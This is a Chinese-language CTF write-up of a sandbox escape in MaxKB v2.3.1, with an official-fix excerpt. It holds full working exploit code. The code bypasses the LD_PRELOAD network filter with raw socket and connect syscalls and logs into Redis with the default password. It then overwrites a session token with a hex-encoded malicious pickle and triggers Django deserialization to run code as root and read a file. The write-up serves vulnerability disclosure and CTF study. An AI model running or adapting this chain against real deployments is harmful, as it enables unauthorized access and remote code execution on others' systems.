MaxKB v2.3.1 sandbox漏洞挖掘

这个漏洞是在RCTF比赛中,题目所使用的开源MaxKB v2.3.1中挖到的非预期0day漏洞,以下是整个验证部分。

已知MaxKB v2.3.1比起上一版本修复了一个SSRF漏洞,同时对SSRF进行了拦截,主要依靠sandbox.c将工具中的python代码限制在沙箱中。

根据对sandbox.c和sanbox.so以及对.SANDBOX_BANNED_HOSTS的分析,我们发现,sandbox的网络拦截不全面,依旧存在SSRF漏洞,以下是漏洞挖掘过程和分析。

漏洞挖掘和分析

首先我们使用dockerfile开启一个docker靶机进行测试。

经过对sandbox.c的简单阅读,我们将docker靶机中的.SANDBOX_BANNED_HOSTS和sandbox.so文件给复制到我们的本地中,来用于辅助分析。

首先.SANDBOX_BANNED_HOSTS中存在如下内容,

127.0.0.1,localhost,host.docker.internal,maxkb,pgsql,redis,7b74845e3202,172.17.0.2

首先用ai写一个bash脚本进行分析,确定了sandbox.so的逻辑确实为samndbox.c和.SANDBOX_BANNED_HOSTS的逻辑实现,接下来,我们边进行逻辑分析。

将sandbox.c和.SANDBOX_BANNED_HOSTS让ai理出实现逻辑,下面贴上LLM的简单分析

这段代码实现了一个基于 LD_PRELOAD 的网络连接拦截器(沙盒),其主要功能是阻止程序访问特定的 IP 地址和域名。

核心机制

代码通过 LD_PRELOAD技术劫持了两个关键的系统调用,并在程序运行时动态检查连接目标是否在黑名单中。

拦截的具体内容

代码从两个层面进行拦截:

IP 地址拦截(connect函数)

时机:在程序通过 connect系统调用尝试建立 TCP 连接时触发。

检查对象:目标 sockaddr结构体中的 IP 地址(支持 IPv4 和 IPv6)。

行为:将目标 IP 与黑名单进行精确的正则匹配。如果匹配成功,则打印日志、设置 errno为 EACCES(权限不足)并返回 -1,从而阻止连接建立。

域名拦截(getaddrinfo函数)

时机:在程序通过 getaddrinfo库函数尝试解析域名时触发。

检查对象:传入的 node参数(通常是主机名或域名)。

关键设计:只拦截纯域名,不拦截已格式化的 IP 地址字符串。代码会先用 inet_pton判断 node是否为合法的 IP 字符串,如果是则跳过黑名单检查。

行为:对非 IP 的域名进行黑名单匹配。如果匹配成功,则打印日志并返回 EAI_FAIL,模拟 DNS 解析失败,从而阻止程序获取目标域名的 IP 地址。

黑名单配置

来源:从与当前动态链接库(.so文件)相同目录下的 .SANDBOX_BANNED_HOSTS文本文件中读取。

格式:黑名单内容为一个字符串,不同条目用逗号分隔。每个条目可以是一个具体的 IP(如 127.0.0.1)或域名(如 localhost),也可以是一个正则表达式(如 .*\.evil\.com$)。

匹配逻辑:使用正则表达式进行 ^pattern$形式的精确匹配,并忽略大小写。

总结

此代码片段构建了一个轻量级的应用层防火墙,通过劫持网络相关的系统调用和库函数,根据可配置的黑名单规则,在连接建立阶段和域名解析阶段对程序试图访问的特定网络目标(IP 和域名)进行阻断。代码末尾给出的示例黑名单 127.0.0.1,localhost,host.docker.internal,...即为会被拦截的目标。

显而易见,这个只hook了两个库函数,socket可以正常使用,所以我们尝试使用一个底层的方法来实现绕过,比如syscall。

到此为止我们的分析结束,在进行一个poc的验证,我们尝试连接Redis,并且依靠默认账号密码登录。

import socket
import ctypes
import struct
import os

def bypass_ld_preload():
    libc = ctypes.CDLL(None, use_errno=True)
    SYS_SOCKET = 41
    SYS_CONNECT = 42
    AF_INET = socket.AF_INET
    SOCK_STREAM = socket.SOCK_STREAM

    # syscall 版本的 socket 和 connect
    def sys_connect(host, port):
        # 1. 通过 syscall 创建 socket
        fd = libc.syscall(SYS_SOCKET, AF_INET, SOCK_STREAM, 0)
        if fd < 0:
            return None, {"step": "socket", "errno": ctypes.get_errno()}
        
        # 2. 准备 sockaddr_in 结构
        sin_port = socket.htons(port)
        sin_addr = socket.inet_aton(host)
        packed = struct.pack("HH4s8x", AF_INET, sin_port, sin_addr)
        addr = ctypes.create_string_buffer(packed, len(packed))
        
        # 3. 通过 syscall 直接进行 connect
        ret = libc.syscall(SYS_CONNECT, fd, addr, ctypes.c_uint32(len(packed)))
        if ret != 0:
            err = ctypes.get_errno()
            os.close(fd)
            return None, {"step": "connect", "errno": err}
        
        # 4. 转换为 socket 对象并返回
        s = socket.fromfd(fd, AF_INET, SOCK_STREAM)
        os.close(fd)  # fromfd 会复制 fd,所以关闭原来的
        s.settimeout(3.0)
        return s, None

    def redis_login():
        # 连接到 Redis
        s, err = sys_connect("127.0.0.1", 6379)
        if s is None:
            return None, err
        
        try:
            # Redis 协议编码函数
            def enc(parts):
                buf = b"*" + str(len(parts)).encode() + b"\r\n"
                for p in parts:
                    if isinstance(p, str):
                        b = p.encode()
                    else:
                        b = p
                    buf += b"$" + str(len(b)).encode() + b"\r\n" + b + b"\r\n"
                return buf
            
            # 发送 AUTH 命令(使用默认密码)
            s.sendall(enc(["AUTH", "Password123@redis"]))
            
            # 接收响应
            data = b""
            while True:
                try:
                    chunk = s.recv(4096)
                except Exception:
                    break
                if not chunk:
                    break
                data += chunk
                if len(data) > 1024:
                    break
            
            return data, None
            
        finally:
            try:
                s.close()
            except Exception:
                pass
    
    # 执行 Redis 登录
    resp, err = redis_login()
    if resp is None:
        return {
            "status": "failure",
            "step": "connection",
            "error": err
        }
    
    # 解析响应
    response_text = resp.decode("latin1", "ignore").strip()
    
    if response_text.startswith("+OK"):
        return {
            "status": "success",
            "message": "Redis 登录成功",
            "response": response_text,
            "method": "syscall 绕过 LD_PRELOAD 拦截"
        }
    else:
        return {
            "status": "failure",
            "message": "Redis 登录失败",
            "response": response_text
        }

# 直接运行
if __name__ == "__main__":
    result = bypass_ld_preload()
    print("运行结果:")
    print(f"状态: {result['status']}")
    print(f"消息: {result['message']}")
    if 'response' in result:
        print(f"Redis 响应: {result['response']}")
    if 'error' in result:
        print(f"错误详情: {result['error']}")
    if 'method' in result:
        print(f"使用的方法: {result['method']}")
{
  "status": "success",
  "message": "Redis 登录成功",
  "response": "+OK",
  "method": "syscall 绕过 LD_PRELOAD 拦截"
}

我们使用ai编写了一个脚本并成功实现了绕过,至此漏洞挖掘分析完成。

官方修复

官方在v2.4.0版本在sandbox.c中加入了以下内容

long syscall(long number, ...) {
    // 检查系统调用号
    switch (number) {
        case SYS_execve:
        case SYS_execveat:
        case SYS_fork:
        case SYS_vfork:
        case SYS_clone:
        case SYS_clone3:
            if (!allow_create_subprocess()) return deny();
    }
    return real_syscall(number, ...);
}
static void ensure_config_loaded() {
    if (!banned_hosts) load_sandbox_config();
}

通过两个步骤封堵了预期的LD_PRELOAD注入,以及非预期的syscall绕过。

写题时的payload

def pwn():
    import socket, ctypes, struct, os

    libc = ctypes.CDLL(None, use_errno=True)
    SYS_SOCKET = 41
    SYS_CONNECT = 42
    AF_INET = socket.AF_INET
    SOCK_STREAM = socket.SOCK_STREAM

    # -------- syscall 版 connect,复用你之前成功的写法 --------
    def sys_connect(host, port):
        fd = libc.syscall(SYS_SOCKET, AF_INET, SOCK_STREAM, 0)
        if fd < 0:
            return None, {"step": "socket", "errno": ctypes.get_errno()}
        sin_port = socket.htons(port)
        sin_addr = socket.inet_aton(host)
        packed = struct.pack("HH4s8x", AF_INET, sin_port, sin_addr)
        addr = ctypes.create_string_buffer(packed, len(packed))
        ret = libc.syscall(SYS_CONNECT, fd, addr, ctypes.c_uint32(len(packed)))
        if ret != 0:
            err = ctypes.get_errno()
            os.close(fd)
            return None, {"step": "connect", "errno": err}
        s = socket.fromfd(fd, AF_INET, SOCK_STREAM)
        os.close(fd)
        s.settimeout(3.0)
        return s, None

    # -------- Redis 命令:每次建立新连接 + AUTH --------
    def redis_cmd(args):
        s, err = sys_connect("127.0.0.1", 6379)
        if s is None:
            return None, err
        try:
            def enc(parts):
                buf = b"*" + str(len(parts)).encode() + b"\r\n"
                for p in parts:
                    if isinstance(p, str):
                        b = p.encode()
                    else:
                        b = p
                    buf += b"$" + str(len(b)).encode() + b"\r\n" + b + b"\r\n"
                return buf

            # 先 AUTH(官方镜像默认)
            s.sendall(enc(["AUTH", "Password123@redis"]))
            try:
                _ = s.recv(1024)
            except Exception:
                pass

            # 再发真正的命令
            s.sendall(enc(args))
            data = b""
            while True:
                try:
                    chunk = s.recv(4096)
                except Exception:
                    break
                if not chunk:
                    break
                data += chunk
                if len(data) > 65536:
                    break
            return data, None
        finally:
            try:
                s.close()
            except Exception:
                pass

    # 1. 找 :TOKEN:* 这个 key
    resp, err = redis_cmd(["KEYS", ":TOKEN*"])
    if resp is None:
        return {"ok": False, "stage": "keys", "error": err}
    txt = resp.decode("latin1", "ignore")
    pos = txt.find(":TOKEN:")
    if pos == -1:
        return {"ok": False, "stage": "no_token_key", "raw": txt[:200]}
    end = txt.find("\r\n", pos)
    if end == -1:
        return {"ok": False, "stage": "parse_key", "raw": txt[:200]}
    token_key = txt[pos:end]

    # key 类似 :TOKEN:<token_str>,取后半段当真正 token
    try:
        token_str = token_key.split(":TOKEN:", 1)[1]
    except Exception:
        return {"ok": False, "stage": "split_token", "token_key": token_key}

    # 2. 用恶意 pickle 覆盖这个 key 的 value
    # 载荷逻辑(在 Django / root 进程里反序列化执行):
    #   data = open("/root/flag","r").read()
    #   open("/opt/maxkb-app/sandbox/pwned_flag","w").write(data)
    hex_payload = (
        "800595a0000000000000008c086275696c74696e73948c04657865639493948c"
        "84696d706f7274206275696c74696e732c6f730a64617461203d206275696c74"
        "696e732e6f70656e28222f726f6f742f666c6167222c227222292e7265616428"
        "290a6275696c74696e732e6f70656e28222f6f70742f6d61786b622d6170702f"
        "73616e64626f782f70776e65645f666c6167222c227722292e77726974652864"
        "617461290a94859452942e"
    )
    payload_bytes = bytes.fromhex(hex_payload)

    set_resp, err2 = redis_cmd(["SET", token_key, payload_bytes])
    if set_resp is None:
        return {"ok": False, "stage": "set_token", "error": err2}
    set_text = set_resp.decode("latin1", "ignore")[:100]

    # 3. syscall 打 8080,用 token 触发 Django 反序列化
    def http_trigger(path, header_line):
        s, err3 = sys_connect("127.0.0.1", 8080)
        if s is None:
            return {"path": path, "header": header_line.split(":", 1)[0], "error": err3}
        try:
            req = (
                "GET {p} HTTP/1.1\r\n"
                "Host: 127.0.0.1:8080\r\n"
                "{h}\r\n"
                "Connection: close\r\n\r\n"
            ).format(p=path, h=header_line)
            s.sendall(req.encode("ascii", "ignore"))
            data = b""
            while True:
                try:
                    chunk = s.recv(4096)
                except Exception:
                    break
                if not chunk:
                    break
                data += chunk
                if len(data) > 8192:
                    break
            line = data.split(b"\r\n", 1)[0].decode("latin1", "ignore")
            parts = line.split(" ")
            code = None
            if len(parts) >= 2 and parts[1].isdigit():
                code = int(parts[1])
            return {"path": path, "header": header_line.split(":", 1)[0], "status": code}
        finally:
            try:
                s.close()
            except Exception:
                pass

    headers = [
        "Authorization: " + token_str,
        "Authorization: Token " + token_str,
        "Cookie: token=" + token_str,
        "Cookie: auth=" + token_str,
    ]
    http_results = []
    for pth in ["/admin/", "/admin/api/workspace/current_user"]:
        for h in headers:
            http_results.append(http_trigger(pth, h))

    # 4. 读 root 进程写出来的 flag 文件
    flag_path = "/opt/maxkb-app/sandbox/pwned_flag"
    if os.path.exists(flag_path):
        try:
            with open(flag_path, "r") as f:
                flag = f.read().strip()
        except Exception as e:
            return {
                "ok": False,
                "stage": "read_flag_error",
                "flag_path": flag_path,
                "error": repr(e),
                "token_key": token_key,
                "token_str_head": token_str[:64],
                "set_reply": set_text,
                "http": http_results,
            }
        return {
            "ok": True,
            "stage": "done",
            "flag": flag,
            "token_key": token_key,
            "token_str_head": token_str[:64],
            "set_reply": set_text,
            "http": http_results,
        }
    else:
        return {
            "ok": False,
            "stage": "flag_not_written",
            "flag_path": flag_path,
            "token_key": token_key,
            "token_str_head": token_str[:64],
            "set_reply": set_text,
            "http": http_results,
        }